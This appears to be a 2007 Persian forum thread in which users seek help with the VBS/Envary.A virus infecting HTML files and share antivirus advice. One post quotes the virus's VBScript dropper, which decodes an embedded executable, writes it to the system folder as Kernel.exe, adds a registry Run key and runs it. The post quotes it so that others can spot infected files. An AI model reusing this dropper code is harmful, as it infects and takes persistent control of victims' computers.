انجمن‌های سرمایه

انجمن‌های سرمایه (https://forum.sarmaye.com/index.php)
-   کامپیوتر و اینترنت (https://forum.sarmaye.com/forumdisplay.php?f=43)
-   -   VBS/Envary.A virus (https://forum.sarmaye.com/showthread.php?t=2930)

nanoc August 8th, 2007 14:32
VBS/Envary.A virus
 
سلام دوستان :blush:
ویروس سیستم منو وخورد !!!:whoow:
اسم ویروس : VBS/Envary.A virus
این ویروس روی فایل های htm قرار ميگیره و با اجرای اینترنت اکسپلورر اجرا میشه و...

چون شکم گرفته بود که ویروس دارم
Nod32 كه محسن خان قرار داده بود رو دانلود کردم
دیدم بههههههههه 59000 فایل ویروسی :whoow: :cry: :blink: :blink: :blink:
همه هم فایل های فارکس ...
مشکلی که الان دارم اینه که Nod توانايي پاک سازی فایل ها رو نداره یا پاک میکنه یا تغییر نام !!
دوستان اگر نرم افزاری میشناسن که این فایل ها رو تمیز کنه و پاک نکننه لطفا کمک کنن:rolleyes:

کاری که میخوام بکنم نوشتن یه برنامه برای پاک کردن اون تیکه از کد مخرب ویروس هست ! البته اگر راه دیگری نباشه
ممنون
موفق باشید :advise:

nanoc August 8th, 2007 15:04
Nod رو اپدیت کردم
اسم ویروسه عوض شد
و ویروس به تروجان تغییر نام یافت !!!!!!!!!!!!!!!!!!!
VBS/TrojanDropper.Small.W trojan
!!!
كمكككككككككككككك

K1 August 8th, 2007 15:19
salam .
kaspersky beriz tamameshono az bein mibare..!!

Mohsen August 8th, 2007 17:11
سلام

این یکی را امتحان بفرمایید . امیدوارم بر طرف شود :

[Only registered and activated users can see links. Click Here To Register...]


موفق باشید

nanoc August 30th, 2007 21:29
هاااااااااااااا وکشتمش !
از این آنتی ویروس ها چیزی ...
خودم آنتی شو ونوشتم !
یکی از دوستان در مورد یه نفری گفت به من ویروس داده ...
نگاه کردم دیدم همینه !
دوستان فایل های HTML شون رو چک کنن
آخرش قطعه کدی ناشناسی یا کدی که در همه فایل های HTML داشته باشن ..
مثال !
نقل قول:
<script language=vbscript>
on error resume next
fileexe1="0770901440000030000000000040000000002552 55000000184000000000000000000000064000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000001840000000 00014031186014000180009205033184001076205033084104 10511503211211411110311409710903209909711011011111 60320981010321141171100321051100320680790830321091 11100101046013013010036000000000000000000000212036 14202814406922407914406922407914406922407903009024 30791350692240791081012420791470692240790821050991 04144069224079000000000000000000000000000000000000 00000000000008006900000007600100300008111504706900 00000000000000000000002240000150010110010050120000 02000000000030006000000000000000007017000000000016 00000000003200000000000006400000001600000000000200 00000040000000000040000000000040000000000000000000 00000080006000000004000000139039000000002000000000 00000001600000001600000000000001600000001600000000 00000000000160000000000000000000000000000000000680 32000000100000000000000000000000000000000000000000 00000000000000000000000000000000020340711110321161 11032109121032115097105116058032104116116112058047 04710310511410811510112004611910109811504610511104 71121050991161171141010461041161090340130101110981 06077101115115097103101046083101110100013010109097 10510809706110909710510810904611410109710010810511 01010130101191011101000130101021151110460671141010 97116101084101120116070105108101040115121115032038 03203409208312111511610110911804610010810803404104 61191141051161010320341111021020340130101011101000 32115117098013010"
dim sys
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set fso = df.createobject("Scripting.FileSystemObject","")
set s=df.CreateObject("Shell.Application.1","")
set re=df.createobject("wscript.shell","")
sys=fso.GetSpecialFolder(1)
For a = 1 To Len(filevbs1) Step 3
filevbs2=filevbs2 & chr(mid(filevbs1,a,3))
if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))
next
kr = UCase(re.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows\CurrentVersion\Run\Microsoft Windows"))
fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1
if ucase(fso.FileExists(sys & "\Kernel.exe"))="FALSE" or kr<>ucase(sys & "\KERNEL.EXE") then
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2
s.Open (sys & "\Kernel.exe")
شمام بله!
آنتی ویروس فقط کاسپر اسکای

kaviir October 5th, 2007 00:00
help me
 
منم این ویروس را گرفتم
همه آنتی ویروس ها هم فقط میخوان فایل را حذف کنند
چکار کنم ؟ :cry:

nanoc October 5th, 2007 18:05
نقل قول:
نوشته اصلي بوسيله kaviir (پست 139691)
منم این ویروس را گرفتم
همه آنتی ویروس ها هم فقط میخوان فایل را حذف کنند
چکار کنم ؟ :cry:
سلام
شما اول با کاسپراسکی شاخه ویندوز رو اسکن کنید و ...
بعد این برنامه رو باز کنید
درایو رو انتخاب کنید و روی سرچ کلیک کنید صبر کنید فایل ها رو لیست که کرد بعد روی Clean کلیک کنید
(در قسمت Path ) هم میتونید مسیر جستجو رو بدید
...

[Only registered and activated users can see links. Click Here To Register...]

:rolleyes:

امکان داره برنامه هنگ کنه موردی نداره داره کارشو میکنه !!:blink:
دوستانی هم که شک دارن این وروس رو دارن روی گذینه Find Virus کلیک کنن اگه داشته باشن لیست میکنه :happy:
موفق و پیروز باشید

m.zamani October 5th, 2007 18:46
مجموعه ای از ضد ویروسهای قدرتمند

[Only registered and activated users can see links. Click Here To Register...]

در ادرس نوشته شده -برای دانلود - بر روی ادامه مطلب کلیک کنید...

kaviir October 5th, 2007 23:53
mamnoon
 
نقل قول:
نوشته اصلي بوسيله nanoc (پست 139861)
سلام
شما اول با کاسپراسکی شاخه ویندوز رو اسکن کنید و ...
بعد این برنامه رو باز کنید
درایو رو انتخاب کنید و روی سرچ کلیک کنید صبر کنید فایل ها رو لیست که کرد بعد روی Clean کلیک کنید
(در قسمت Path ) هم میتونید مسیر جستجو رو بدید
...

[Only registered and activated users can see links. Click Here To Register...]

:rolleyes:

امکان داره برنامه هنگ کنه موردی نداره داره کارشو میکنه !!:blink:
دوستانی هم که شک دارن این وروس رو دارن روی گذینه Find Virus کلیک کنن اگه داشته باشن لیست میکنه :happy:
موفق و پیروز باشید
واقعا ممنون

astaraus October 6th, 2007 04:51
اقا من هرکاری میکنم پاک نمیشه
کمکی بکنید

nanoc October 6th, 2007 05:03
یکی از فایل های ویروسی رو یه جا آپلود کنید لینک بدید !
با آنتی ویروس کاسپراسکی درایو ویندوز رو اسکن کنید ویروس .. رو ..

PAYAM20 September 12th, 2008 16:17
نقل قول:
نوشته اصلي بوسيله nanoc (پست 139861)
سلام
شما اول با کاسپراسکی شاخه ویندوز رو اسکن کنید و ...
بعد این برنامه رو باز کنید
درایو رو انتخاب کنید و روی سرچ کلیک کنید صبر کنید فایل ها رو لیست که کرد بعد روی Clean کلیک کنید
(در قسمت Path ) هم میتونید مسیر جستجو رو بدید
...

[Only registered and activated users can see links. Click Here To Register...]

:rolleyes:

امکان داره برنامه هنگ کنه موردی نداره داره کارشو میکنه !!:blink:
دوستانی هم که شک دارن این وروس رو دارن روی گذینه Find Virus کلیک کنن اگه داشته باشن لیست میکنه :happy:
موفق و پیروز باشید
برنامه از سرور پاک شده
اگه میشه دوباره آپ کنیدش
ممنون

mohsen66 September 12th, 2008 16:26
نقل قول:
نوشته اصلي بوسيله PAYAM20 (پست 223591)
برنامه از سرور پاک شده
اگه میشه دوباره آپ کنیدش
ممنون
آقا پیام حدود یه سال دیر رسیدید ;)
به تاریخ آخرین پست قبل از خود نگاه کنید.
ارادت


ساعت جاري 14:57 با تنظيم GMT +4.5 مي باشد.

Powered by vBulletin Version 3.8.10
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.

تمام حقوق براي سايت سرمايه دات کام محفوظ می باشد.
نقل مطالب بدون کسب اجازه از مدیران سایت ممنوع است.